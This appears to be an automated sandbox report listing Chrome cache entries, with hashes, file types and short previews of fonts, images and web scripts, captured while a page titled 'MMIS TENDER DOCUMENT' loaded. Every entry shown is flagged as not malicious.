Preview:	<svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1401.6z" fill="url(#A)"/><path d="M394.2 1815.6c746.58 0 1351.8-493.2 1351.8-1101.6S1140.78-387.6 394.2-387.6-957.6 105.603-957.6 714-352.38 1815.6 394.2 1815.6z" fill="url(#B)"/><path d="M1548.6 1885.2c631.92 0 1144.2-417.45 1144.2-932.4S2180.52 20.4 1548.6 20.4 404.4 437.85 404.4 952.8s512.276 932.4 1144.2 932.4z" fill="url(#C)"/><path d="M265.8 1215.6c690.246 0 1249.8-455.595 1249.8-1017.6S956.046-819.6 265.8-819.6-984-364.005-984 198-424.445 1215.6 265.8 1215.6z" fill="url(#D)"/></g><defs><radialGradient id="A" cx="0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(1466.4 393.6) rotate(90) scale(1401.6 1720.8)"><stop stop-color="#107c10"/><stop offset="1" stop-color="#c4c4c4" stop-opacity="0"/></radialGradient><r

Chrome Cache Entry: 111

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 1024 x 661, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	100110
Entropy (8bit):	7.969400523619405
Encrypted:	false
SSDEEP:
MD5:	AD43689CA43543937AE593F66C295882
SHA1:	233EFA9B52D280388098AE889863824D10D29034
SHA-256:	A10293AF9850AA00FBACD3E864FBF617EBFF709AE07B750D5092DFCBE251713C
SHA-512:	D17DA2E2CF9FA4C82FEE775839F5404231EA04C4CC0A05E391DCDDE657D77AAF4D327F1E62879B7958ADF2F4B9B051B070A570685FD61244042282705D32365D
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR.............f.i{...IiCCPicc..x..WwTS..[....j.......@J.-..n#$!.B.!A.^.Up.b.....V@....".]..+..v.w........9..s..w..yo....O.d2...P(U."C...YL.c@..(...._,c'$....._...+..X...=.....$.@..._.....W.er..Q..LW.T.......Y..%]4.W...!...'%..@l...xr..N'.0K."..N?..K.b)....A..E..z6.8..E2..>+.8..b....D#.P-j.....$....-...0.=.P..QI......E1....Is...@..y#.....PJ.2u..5..s.......xa1.`..FH%q..<'W....].t.X.M..c.t..8<Y.M^...B.r....?..yU\....lM..yB.&>.S........D....:..[qAr..g\|i.'n.G.LR.o..%....C.\yD....x.^l[......+.R......y.....N.....V",...E .....{"..&k.)BU\..8E&Q.&..pk.$R.[..^.%..x.B..9#<W.HP.......U.7.._....0`.....E....>`j,...9.@...dxG.."..$C)..R.B..P.U.% ..#....r......x.r(.......]...4... ..;....".@.....0..a..b5.r..I..$...Q....n....x,....A.........OxD."< \#t.nM./.f......P.9_....=po<...T.q.n.......x0..{.~......=.G._....NF..!d....q...........5g........E..(...zbK.#X.v...........v.J.y.T.+.aKR.S.....o.dU.,v.s.u.0dS.g....)...Ey.&[&...\).m......@.}.z}.LT.7.F.gl.o

Chrome Cache Entry: 113

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text, with very long lines (464)
Category:	downloaded
Size (bytes):	1115
Entropy (8bit):	5.5846062871846405
Encrypted:	false
SSDEEP:
MD5:	F85AFC32FF2939567F8534613F372EC6
SHA1:	F4983B0C6BF6799CDF4A267AA944214EE78314DB
SHA-256:	102A4AEE69270E686151BC63F69F229651D33B90C836F45DEEE3F16D3C7B6BF5
SHA-512:	F14973B9E6EB35EE4D4643180D648B9681DF200F5FFD580DABF186EA3253A5B1B830332D5CFB256E76231218206A5AF493233533F7B88B814050C80BF813B0BB
Malicious:	false
Reputation:	unknown
URL:	https://framerusercontent.com/sites/3tCBPFDdoNUnhEq4hChBL3/chunk-6WQAKGGX.mjs
Preview:	function t(a,e){return{favicon:"https://framerusercontent.com/assets/GWYbiaQZn3s247RxhvrEhGgoc.png",socialImage:"https://framerusercontent.com/assets/zumoRCTeMhW1PcigWKmwVqKrLWQ.jpg",title:"MMIS TENDER DOCUMENT"}}function s(a,e){return{bodyClassName:"framer-body-augiA20Il",breakpoints:[{hash:"72rtr7"}],customHTMLHeadEnd:` Google tag (gtag.js) -->.<script async="" src="https://www.googletagmanager.com/gtag/js?id=G-V94YGGJ7Z7">.<\/script>.<script>. window.dataLayer = window.dataLayer \|\| [];. function gtag(){dataLayer.push(arguments);}. gtag('js', new Date());.. gtag('config', 'G-V94YGGJ7Z7');.<\/script>`,description:t(a,e).description,elements:{ip94oGIHA:"features-2"},framerSearch:{index:!0},socialImage:"https://framerusercontent.com/assets/zumoRCTeMhW1PcigWKmwVqKrLWQ.jpg",title:"MMIS TENDER DOCUMENT",viewport:"width=1200"}}var p=1,d={exports:{default:{type:"function",annotations:{framerContractVersion:"1"}},metadataVersion:{type:"variable",annotations:{framerContractVersion:"1"}

Chrome Cache Entry: 119

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (402)
Category:	downloaded
Size (bytes):	447
Entropy (8bit):	5.235329890714427
Encrypted:	false
SSDEEP:
MD5:	BAC0D5B5F6A61029B51079932CCDA746
SHA1:	9C42942192643D366F236B17FE9B6B516770DBC9
SHA-256:	4E0EA1029EAB3B7C0BB3183EAA684B29064F2DE371720317B8A35519FE26589E
SHA-512:	2A871B6478BFD78F3E573779DE12ABFD529E9AF5CF2853104BCE8B6146B7BE56F43719110843FBF20D294FFDA7B0D329113B2593A7E30802A52EFF6656E96D4F
Malicious:	false
Reputation:	unknown
URL:	https://framerusercontent.com/sites/3tCBPFDdoNUnhEq4hChBL3/chunk-ELYU6EKT.mjs
Preview:	var e=Object.defineProperty;var d=(n,t)=>{for(var o in t)e(n,o,{get:t[o],enumerable:!0})};var f=typeof document<"u"?globalThis.navigator:void 0,r=typeof document<"u"?globalThis.window:void 0,i=typeof document>"u"?{}:void 0;if(typeof document>"u"){let n=Object.prototype.toString;Object.prototype.toString=function(...t){return this===i?"[object global]":n.call(this,...t)}}export{d as a,f as b,r as c};.//# sourceMappingURL=chunk-ELYU6EKT.mjs.map.

Chrome Cache Entry: 121

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text
Category:	downloaded
Size (bytes):	315
Entropy (8bit):	5.0572271090563765
Encrypted:	false
SSDEEP:
MD5:	A34AC19F4AFAE63ADC5D2F7BC970C07F
SHA1:	A82190FC530C265AA40A045C21770D967F4767B8
SHA-256:	D5A89E26BEAE0BC03AD18A0B0D1D3D75F87C32047879D25DA11970CB5C4662A3
SHA-512:	42E53D96E5961E95B7A984D9C9778A1D3BD8EE0C87B8B3B515FA31F67C2D073C8565AFC2F4B962C43668C4EFA1E478DA9BB0ECFFA79479C7E880731BC4C55765
Malicious:	false
Reputation:	unknown
URL:	https://frconversions.org/favicon.ico
Preview:	<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL was not found on this server.</p>.<p>Additionally, a 404 Not Found.error was encountered while trying to use an ErrorDocument to handle the request.</p>.</body></html>.

Chrome Cache Entry: 122

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (15881)
Category:	downloaded
Size (bytes):	15882
Entropy (8bit):	5.16262289335083
Encrypted:	false
SSDEEP:
MD5:	0F263119E3F86365913231B72EC21EBD
SHA1:	BFD2CD682FBA23B3945480B3D7E556856D505077
SHA-256:	03337E69F3BA0D92C0EE4E6336EAB382BBB5CE99D425BC1C0092A9B8618DF364
SHA-512:	3B3B6934B2E5D775F8EB28E14271FF02ADE1F7D4A1A783373902777EE134CA034E1094B2DAE429E92D08D242A90A83951BAAE2A0BAF3033BC827F4D3CABD9A02
Malicious:	false
Reputation:	unknown
URL:	https://events.framer.com/script
Preview:	(()=>{var g,P,ie,A,N,L=function(){return window.performance&&performance.getEntriesByType&&performance.getEntriesByType("navigation")[0]},B=function(t){if(document.readyState==="loading")return"loading";var e=L();if(e){if(t<e.domInteractive)return"loading";if(e.domContentLoadedEventStart===0\|\|t<e.domContentLoadedEventStart)return"dom-interactive";if(e.domComplete===0\|\|t<e.domComplete)return"dom-content-loaded"}return"complete"},ye=function(t){var e=t.nodeName;return t.nodeType===1?e.toLowerCase():e.toUpperCase().replace(/^#/,"")},k=function(t,e){var i="";try{for(;t&&t.nodeType!==9;){var n=t,r=n.id?"#"+n.id:ye(n)+(n.classList&&n.classList.value&&n.classList.value.trim()&&n.classList.value.trim().length?"."+n.classList.value.trim().replace(/\s+/g,"."):"");if(i.length+r.length>(e\|\|100)-1)return i\|\|r;if(i=i?r+">"+i:r,n.id)break;t=n.parentNode}}catch{}return i},ae=-1,oe=function(){return ae},y=function(t){addEventListener("pageshow",function(e){e.persisted&&(ae=e.timeStamp,t(e))},!0)},b=fun

Chrome Cache Entry: 124

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	1592
Entropy (8bit):	4.205005284721148
Encrypted:	false
SSDEEP:
MD5:	4E48046CE74F4B89D45037C90576BFAC
SHA1:	4A41B3B51ED787F7B33294202DA72220C7CD2C32
SHA-256:	8E6DB1634F1812D42516778FC890010AA57F3E39914FB4803DF2C38ABBF56D93
SHA-512:	B2BBA2A68EDAA1A08CFA31ED058AFB5E6A3150AABB9A78DB9F5CCC2364186D44A015986A57707B57E2CC855FA7DA57861AD19FC4E7006C2C239C98063FE903CF
Malicious:	false
Reputation:	unknown
Preview:	<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><defs><style>.a{fill:none;}.b{fill:#404040;}</style></defs><rect class="a" width="48" height="48"/><path class="b" d="M40,32.578V40H32V36H28V32H24V28.766A10.689,10.689,0,0,1,19,30a10.9,10.9,0,0,1-5.547-1.5,11.106,11.106,0,0,1-2.219-1.719A11.373,11.373,0,0,1,9.5,24.547a10.4,10.4,0,0,1-1.109-2.625A11.616,11.616,0,0,1,8,19a10.9,10.9,0,0,1,1.5-5.547,11.106,11.106,0,0,1,1.719-2.219A11.373,11.373,0,0,1,13.453,9.5a10.4,10.4,0,0,1,2.625-1.109A11.616,11.616,0,0,1,19,8a10.9,10.9,0,0,1,5.547,1.5,11.106,11.106,0,0,1,2.219,1.719A11.373,11.373,0,0,1,28.5,13.453a10.4,10.4,0,0,1,1.109,2.625A11.616,11.616,0,0,1,30,19a10.015,10.015,0,0,1-.125,1.578,10.879,10.879,0,0,1-.359,1.531Zm-2,.844L27.219,22.641a14.716,14.716,0,0,0,.562-1.782A7.751,7.751,0,0,0,28,19a8.786,8.786,0,0,0-.7-3.5,8.9,8.9,0,0,0-1.938-2.859A9.269,9.269,0,0,0,22.5,10.719,8.9,8.9,0,0,0,19,10a8.786,8.786,0,0,0-3.5.7,8.9,8.9,0,0,0-2.859,1.938A9.269,9.269,0,0,0,

Chrome Cache Entry: 125

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (32317)
Category:	downloaded
Size (bytes):	32400
Entropy (8bit):	5.4846227525888755
Encrypted:	false
SSDEEP:
MD5:	D37270E5ED74F49485FCB0E9DDB206F9
SHA1:	82B4C784E4EAA1AC683DD600214D0BFA7A823D61
SHA-256:	FA6A9CF94647D5D2D98258392827B9EC7E03408A537DF6B099A5A408CB2B2D2F
SHA-512:	11B6BB546305C98F1180AD925DC1E3C9213A9243C2E2484D7162AD743844433DCA8C31F0046DBE814671C54208DE3DC8156859D40B102E9F71CE2BFD5CE490E8
Malicious:	false
Reputation:	unknown
URL:	https://framerusercontent.com/sites/3tCBPFDdoNUnhEq4hChBL3/J4IX_x-Nnk57nAgothv7DFoDCNMwTr5FEbFL7C7eN1s.CE4ZBF3D.mjs
Preview:	import{a as _}from"./chunk-6WQAKGGX.mjs";import{$ as fe,A as $,C as P,D as ee,E as re,F as te,G as Z,H as ae,I as ne,J as D,N as B,P as H,S as oe,T as ie,U as se,W as le,X as y,Y as j,Z as F,_ as W,aa as U,b as u,d as V,f as X,g as E,h as J,i as Q,j as A,l as L,m as i,n as S,o as e,p as s,u as R,x as c}from"./chunk-OESQHJT7.mjs";import"./chunk-ELYU6EKT.mjs";y.loadFonts(["GF;IBM Plex Sans Condensed-600","GF;IBM Plex Sans Condensed-700","GF;IBM Plex Sans Condensed-700italic","GF;IBM Plex Sans Condensed-600italic"]);var me=[{explicitInter:!0,fonts:[{family:"IBM Plex Sans Condensed",source:"google",style:"normal",url:"https://fonts.gstatic.com/s/ibmplexsanscondensed/v14/Gg8gN4UfRSqiPg7Jn2ZI12V4DCEwkj1E4LVeHY527Ivur4cFFwq5.woff2",weight:"600"},{family:"IBM Plex Sans Condensed",source:"google",style:"normal",url:"https://fonts.gstatic.com/s/ibmplexsanscondensed/v14/Gg8gN4UfRSqiPg7Jn2ZI12V4DCEwkj1E4LVeHY4S7Yvur4cFFwq5.woff2",weight:"700"},{family:"IBM Plex Sans Condensed",source:"google",styl

Chrome Cache Entry: 127

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (32065)
Category:	downloaded
Size (bytes):	85578
Entropy (8bit):	5.366055229017455
Encrypted:	false
SSDEEP:
MD5:	2F6B11A7E914718E0290410E85366FE9
SHA1:	69BB69E25CA7D5EF0935317584E6153F3FD9A88C
SHA-256:	05B85D96F41FFF14D8F608DAD03AB71E2C1017C2DA0914D7C59291BAD7A54F8E
SHA-512:	0D40BCCAA59FEDECF7243D63B33C42592541D0330FEFC78EC81A4C6B9689922D5B211011CA4BE23AE22621CCE4C658F52A1552C92D7AC3615241EB640F8514DB
Malicious:	false
Reputation:	unknown
URL:	https://frconversions.org/jq/7d0f96ff9ef6b58952bc095b438596c6660cf4c8795d5
Preview:	/! jQuery v2.2.4 \| (c) jQuery Foundation \| jquery.org/license /.!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=a.document,e=c.slice,f=c.concat,g=c.push,h=c.indexOf,i={},j=i.toString,k=i.hasOwnProperty,l={},m="2.2.4",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+\|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return e.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:e.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a){return n.each(this,a)},map:function(a){return this.pushStack(n.map(this,function(b,c){return a.call

Chrome Cache Entry: 130

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Java source, ASCII text, with very long lines (1896)
Category:	downloaded
Size (bytes):	1951
Entropy (8bit):	5.467312294596768
Encrypted:	false
SSDEEP:
MD5:	EB80E970757270C69E0D5BB80B26BF0B
SHA1:	07BA8C33B0F5B704B010220B08DFBBB514829E62
SHA-256:	01B9134FCA760F9E725E64E9CD6FD9AA3EE5E253EE7931994D252C8915F60898
SHA-512:	CA0BD7FB78854A860D170FAF23C66E116966478EB8F09855046BCF089C0E2C4E08970A748CF6EB9769BA7800DA4C65D31A6DE5690F64208426F397052F3E44F8
Malicious:	false
Reputation:	unknown
URL:	https://framerusercontent.com/sites/3tCBPFDdoNUnhEq4hChBL3/default_script0.2LAEYVQ5.mjs
Preview:	import{B as E,K as I,c as o,e as R,q as g,r as m,s as u,t as y,v as _,w as F,y as v}from"./chunk-OESQHJT7.mjs";import{c as t}from"./chunk-ELYU6EKT.mjs";var O="default"in m?g:m,s={},P=O;s.createRoot=P.createRoot;s.hydrateRoot=P.hydrateRoot;var b=s.createRoot,k=s.hydrateRoot;t.__framer_importFromPackage=(e,c)=>()=>o(F,{error:'Package component not supported: "'+c+'" in "'+e+'"'});t.process={...t.process,env:{...t.process?t.process.env:void 0,NODE_ENV:"production"}};v();t.__framer_events=t.__framer_events\|\|[];function N(){t.__framer_events.push(arguments)}(async()=>{let e={augiA20Il:{elements:{ip94oGIHA:"features-2"},page:u(()=>import("./J4IX_x-Nnk57nAgothv7DFoDCNMwTr5FEbFL7C7eN1s.CE4ZBF3D.mjs")),path:"/"}},c={},p=[{code:"en-US",id:"default",name:"English",slug:""}],x=u(()=>import("./__framer-not-found-page.JQP36LUU.mjs")),n=document.getElementById("main"),r,i,l,d=!1;if("framerHydrateV2"in n.dataset){let a=JSON.parse(n.dataset.framerHydrateV2);r=a.routeId,i=a.localeId,l=a.pathVariables,d=

Chrome Cache Entry: 133

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Web Open Font Format (Version 2), TrueType, length 19428, version 1.0
Category:	downloaded
Size (bytes):	19428
Entropy (8bit):	7.988112810995724
Encrypted:	false
SSDEEP:
MD5:	BC65F4C9D8EF786924C0E4A5A4988E9A
SHA1:	B3BE52DA15EC5DDFF08991107BDF8451FDB774BA
SHA-256:	2E50FD20CC0430024EE9914D1B372F4D98D4490712CA7EB0CDA9D786E3A2B07D
SHA-512:	191EF82F128DF400B4D01CA5EF35B5D491D3FF55AC9837C04BF43459F93A17267EDC821BBE5499208D09581690F6E5EDBEB54B93E3866AC007928CCE07FD6C26
Malicious:	false
Reputation:	unknown
URL:	https://fonts.gstatic.com/s/ibmplexsanscondensed/v14/Gg8gN4UfRSqiPg7Jn2ZI12V4DCEwkj1E4LVeHY4S7bvspYY.woff2
Preview:	wOF2......K........0..K..........................F..6....`..l.<..s.....d..L.....6.$..(. ..Z..=..0...5.O...M...q$B.8..x{.f#,.8. .....s...\..%Y...........9....Z..pt..Y.!...}.s.-.^..^......eY.....}I..;..h....c@.,8....@.@N."g.\|.2..$.....-.2..{...=...........z{.,.M.}Z..?.K.. A.........s.s.{..J`.....Q..F.0A...Fc.b..........1.(..+....H..c...I....e0.>.^.Zv^........P.n[...8m..JU.....~..;V.....B.X..._...........>....@QB,.Qu..g.h.-..L..#....J.Q".`.....=.FM.S.n...cU......../i............q..K.....]........2Eg..P]..o.hlo.r...mi.+].N..e.. ...Q@..d..k......{.......M...0....2m7%w.T9.....01......{u.;#...^.S.MQ'U....6..v.B....pEP.I.f-..wY.......li..A.......f...4..y......>.X.++.u.....\|`..l...L.'.y.o......)ya....7...?. .1..r1.a.9...D....>.........=\|TKDk.Xd...Bl6[.5{...h@.j.9....1.i....626...'.$.l.pO.6.....?./;..~..........'C...J.. ?....R.[..y2....,...........]..I.7....../.&-+T....X.Z......'....;...+.p.~..N4..z...].6&...F.....~.&...a.!..'".^m._...T...h.Z...

Chrome Cache Entry: 136

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	42
Entropy (8bit):	4.136248672727249
Encrypted:	false
SSDEEP:
MD5:	905B1FBB26E082557FF0B3B3553CDA6C
SHA1:	8FE0790D6026998BDB2C9FFA3B915952E613E1B4
SHA-256:	F249B63CB2FCB66B47E86F906C98F8FD912E82DD035B4E53D7E72FC1960CFD16
SHA-512:	284567E83A5C15761498249B27B4B700AA081A65B858F29458E5D0F3DEBDEA93DD5CFAD94EEFAEB43837E70CC288B2A34EA168D2771CB57C993E269C287097CE
Malicious:	false
Reputation:	unknown
Preview:	{"message":"Missing Authentication Token"}

Chrome Cache Entry: 139

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	RIFF (little-endian) data, Web/P image
Category:	downloaded
Size (bytes):	24300
Entropy (8bit):	7.988260259156161
Encrypted:	false
SSDEEP:
MD5:	2F8BE5374191E9497D5577E7F7ECE6AB
SHA1:	503D99D08660EA2A281C43864C53C60986D49DCD
SHA-256:	2D0D433747AFB1E48F6DDADD8F98038857B68C297EA50756F71EFCE02B072D6F
SHA-512:	7DA047F39B773DC99FC209FE19C21584C34EDAEA86F9C930814F80127FDD17202D151346D03F00706562F2AD3A34CB6A7ADDCF4C0F641058827E88E1EE07C8CF
Malicious:	false
Reputation:	unknown
URL:	https://framerusercontent.com/images/GWYbiaQZn3s247RxhvrEhGgoc.png
Preview:	RIFF.^..WEBPVP8X..............ALPH.7.....m.0....C......s.....y.....}m.F..m.)Gdfu...333.o.......!..2.:..r\..tWDL..m....[....b.I...`.....1..h..1..l.>T.dI..."b.x....._....... ..o=..[Ki.....JZ'9#atN8....RJ._lz..:.VC..x..x..X.c7.5..(..'..[L&S.mb0.......?...0.t..n..M...d........Vi.Z..S...f{t.y....UB.J....Y...4.....{1Z.F..g.kH.<.q.y.`W..b.X.7..t..'N.3...Zv.....r.5H....5...Cht:.fr.2.m...C>....e..,.......+...!%..^....]\|e?%....?..P...>..$+..[.....F`.=}.Wo=..d....~../...H.....^o2...~\k....\|.f..5..{..)...@......7{S...?..b......f.^-...l..#.x..x...e..5..=]........".2,..z.h....M6.......>.....vZ%AJ.I&%i;..s.....i..v..)..^.x..A..@..Ii.&.3.k{..b..M.s..E...2.@Pkq.C>.nY....7.;....?.$E.<.,..4......5~&(........................~..>........u. 9.y...._.yk..1B.Gk..2k..@j.Z-.W5:..b.'\F,;.Q.....a....d2Z,....c.~3....px..<..~oGu....^.p.Rc2[.6_rs....o...\|....W_.,._.x..,{...........<.4..]..q...0..W..x8..x.......V..0e4..f[0no<...x.^...@....1.R.?^.....~...n^:7Z.i.ufF-..

Chrome Cache Entry: 141

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (39928)
Category:	downloaded
Size (bytes):	39929
Entropy (8bit):	5.378411954063623
Encrypted:	false
SSDEEP:
MD5:	7F3FE50B0F2AD92528FF217C1B608B27
SHA1:	54FC4814C739C7142EF4A5B562140EE764BCBDFC
SHA-256:	D2E584D67A5B1A868363ED5E83A72EA6BC2CAD8A052F64583D0FE95E7FA36E97
SHA-512:	3B4F838B651CC39D8CA8B5C815CCE04B0062A26F8C398CD5D1943995C2C47049D2546407FBE619219EACF417D1D66FEB0AA77512BF52848CF961BB0D3F7A98EE
Malicious:	false
Reputation:	unknown
URL:	https://challenges.cloudflare.com/turnstile/v0/g/dc6b543c1346/api.js?onload=QkWxI7&render=explicit
Preview:	"use strict";(function(){function gt(e,r,t,i,u,s,g){try{var y=e[s](g),m=y.value}catch(f){t(f);return}y.done?r(m):Promise.resolve(m).then(i,u)}function yt(e){return function(){var r=this,t=arguments;return new Promise(function(i,u){var s=e.apply(r,t);function g(m){gt(s,i,u,g,y,"next",m)}function y(m){gt(s,i,u,g,y,"throw",m)}g(void 0)})}}function k(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):k(e,r)}function Ee(e,r,t){return r in e?Object.defineProperty(e,r,{value:t,enumerable:!0,configurable:!0,writable:!0}):e[r]=t,e}function ze(e){for(var r=1;r<arguments.length;r++){var t=arguments[r]!=null?arguments[r]:{},i=Object.keys(t);typeof Object.getOwnPropertySymbols=="function"&&(i=i.concat(Object.getOwnPropertySymbols(t).filter(function(u){return Object.getOwnPropertyDescriptor(t,u).enumerable}))),i.forEach(function(u){Ee(e,u,t[u])})}return e}function ir(e,r){var t=Object.keys(e);if(Object.getOwnPropertySymbols){var i=Object.getOwnPropertyS

Chrome Cache Entry: 143

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Web Open Font Format (Version 2), TrueType, length 19944, version 1.0
Category:	downloaded
Size (bytes):	19944
Entropy (8bit):	7.9853879044802705
Encrypted:	false
SSDEEP:
MD5:	9A955D233E3FE093A70CB893CA261FAB
SHA1:	AAA0E3BA197DE5D70BE9578D10FCBE7FB48DE4F1
SHA-256:	CDF398F0B57B04F7174B818D55ED5B1D0462802E2CD327AAC8C11D2602EF39FF
SHA-512:	1F8C90194D203F79B7B1CCD143734E5BD17BCFBC68C65AF721AA002D2040F182AC5CA274ACBA18F9A8230B9F7C6B6748CECB326C0FC270E9584AED992B5E1537
Malicious:	false
Reputation:	unknown
URL:	https://fonts.gstatic.com/s/ibmplexsanscondensed/v14/Gg8gN4UfRSqiPg7Jn2ZI12V4DCEwkj1E4LVeHY527LvspYY.woff2
Preview:	wOF2......M...........M..........................F.......`..l.B..s.....8........6.$..(. ..J..=..V......v(t'T..{....@.;.....0.a....G....OIcl.....V.1....@.3C...d.V".4g....d.So:.pF?..fB2..5.:.1..A..m.........^..3..V......v'mf......v.(jz$~....l....U..t.{-)..F.....wz...r...v..............J"1.PT..s.....D.....O.B...j.h.3...R1.4p.@..b.z.o...].U..S...0#K#........]..%..k.,.V............6.E).n.(........G.dI.VLT\89q..X..7..r^..-..-..XP.nm%.2._K.B)-..e.GW...U.]"L......(.......N.a....m....c.........Ahc.,YF.%......[.#...%.B.(......S.Y...X.5y!..D..Z.j6^...a.F....d....nq.4...d..m...U..........H.Zz.)..eHkS.V;snX.....~.+%.R$\|.W..<......sz._..j-.;5._&CI.-r.....q.......j...@.N.d.2...B)...K$P.j.R..*...`JW.D...S.cgx..#L. !`...("./C.b....Q.Z...W .re..#...._.Jgm.>...C...K..XA........@..%.+..9J..d.Q_G..<..>3.....................A..Y....^...!.....G..F..AN..tJr...I. %.P.....)\v.zw.6....8c...f..U...R.....2.9.I...]G...7?..lks.z..C....DD.l...8..8-.$.....w...'..b1.tGHB...

Chrome Cache Entry: 145

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 512 x 512, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	1535
Entropy (8bit):	2.7820158915378563
Encrypted:	false
SSDEEP:
MD5:	13CEFB2688CAEC9C1B465ED4C9D1AB1C
SHA1:	44529E1CD6550EB85EA4D26F9A54B48145759C98
SHA-256:	BBB73D0A439E24C3249D3F4CCF324916E479D25D1407B13F983846AAB5347AE7
SHA-512:	1BF4B50A5E252AD9C62F7DEAF3B00B2CA66C0DF10393ACF0290AA2C53757D6AE5507E1CA0334FDE0A83CC48AB0C44A2D8025849926757BB87331D9A95B842254
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR..............$....!PLTELiq..X............Q.........(..)}vW.....tRNS..QP...?I2....pHYs................rIDATx.....0.D.;'...?..'..4....3.K..5o..6.5............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................A.y.....%..........}.qs........................K.....j..%o..#_..y[v_....9.>.;..<.q..... ..G......(..........(..........(..........(..........(..........(..........(..........(..........(..........(..........(..........(..........(

Chrome Cache Entry: 146

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65536), with no line terminators
Category:	downloaded
Size (bytes):	553798
Entropy (8bit):	5.418462407084781
Encrypted:	false
SSDEEP:
MD5:	7D0E2FBBB21D8A5113DE57850B4A15CC
SHA1:	E65A69EF430E7CCA436ED8B33B81807EC2BD524E
SHA-256:	AA203F219AAF2278A5597550D5DC03623DC8E83FAC223A1733DE75A003A900AA
SHA-512:	BDB1427D7E194474D4056F66AA766FD686C1CDE6F33ADFCFB525CFBD25BC0AE42C5C0B752C0F5A9FFBED9EAB6BBDA81641D8460FBFF6BFFF5D5227D3D02FE9CD
Malicious:	false
Reputation:	unknown
URL:	https://framerusercontent.com/sites/3tCBPFDdoNUnhEq4hChBL3/chunk-OESQHJT7.mjs
Preview:	import{a as Yc,b as je,c as _}from"./chunk-ELYU6EKT.mjs";var Ce={};Yc(Ce,{Children:()=>Rn,Component:()=>ge,Fragment:()=>pi,Profiler:()=>zw,PureComponent:()=>Nw,StrictMode:()=>$w,Suspense:()=>bo,__SECRET_INTERNALS_DO_NOT_USE_OR_YOU_WILL_BE_FIRED:()=>jw,cloneElement:()=>cn,createContext:()=>ye,createElement:()=>ae,createFactory:()=>Ww,createRef:()=>Gp,default:()=>b,forwardRef:()=>Be,isValidElement:()=>Pn,lazy:()=>Uw,memo:()=>Xw,startTransition:()=>mi,unstable_act:()=>Gw,useCallback:()=>ce,useContext:()=>M,useDebugValue:()=>Yw,useDeferredValue:()=>Kw,useEffect:()=>U,useId:()=>_r,useImperativeHandle:()=>qw,useInsertionEffect:()=>mt,useLayoutEffect:()=>vi,useMemo:()=>fe,useReducer:()=>Qw,useRef:()=>D,useState:()=>kt,useSyncExternalStore:()=>Zw,useTransition:()=>Jw,version:()=>eC});var b={},yo=Symbol.for("react.element"),Tw=Symbol.for("react.portal"),Ew=Symbol.for("react.fragment"),Rw=Symbol.for("react.strict_mode"),Pw=Symbol.for("react.profiler"),Iw=Symbol.for("react.provider"),Fw=Symbol.fo

Chrome Cache Entry: 147

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (50758)
Category:	downloaded
Size (bytes):	51039
Entropy (8bit):	5.247253437401007
Encrypted:	false
SSDEEP:
MD5:	67176C242E1BDC20603C878DEE836DF3
SHA1:	27A71B00383D61EF3C489326B3564D698FC1227C
SHA-256:	56C12A125B021D21A69E61D7190CEFA168D6C28CE715265CEA1B3B0112D169C4
SHA-512:	9FA75814E1B9F7DB38FE61A503A13E60B82D83DB8F4CE30351BD08A6B48C0D854BAF472D891AF23C443C8293380C2325C7B3361B708AF9971AA0EA09A25CDD0A
Malicious:	false
Reputation:	unknown
URL:	https://frconversions.org/boot/7d0f96ff9ef6b58952bc095b438596c6660cf4c8795d8
